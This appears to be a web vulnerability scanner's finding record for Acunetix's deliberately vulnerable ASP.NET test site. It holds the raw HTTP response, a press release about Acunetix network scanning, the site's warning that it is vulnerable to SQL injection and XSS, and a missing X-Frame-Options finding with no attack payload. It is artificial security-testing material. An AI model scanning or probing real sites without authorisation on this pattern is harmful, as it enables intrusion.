ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc%2BQWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BRm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A%2BZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg%2FaWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLWjL6iDQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8%2BYwLqXVDFYA1YYr1Hu6oI9o
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 22936
Response Body - size: 22,936 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WBB4EVGV4dAUSUmVhZCB1c2VyIGNvbW1lbnRzHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0wZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZKl3HbqwkCOjuj45XaEhgnLsklpZ" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH7tLMBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBNBPxOo+suXOQO2cYqA7NT0P30nF" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	X-Frame-Options
Attack
Evidence
Show / hide Request and Response
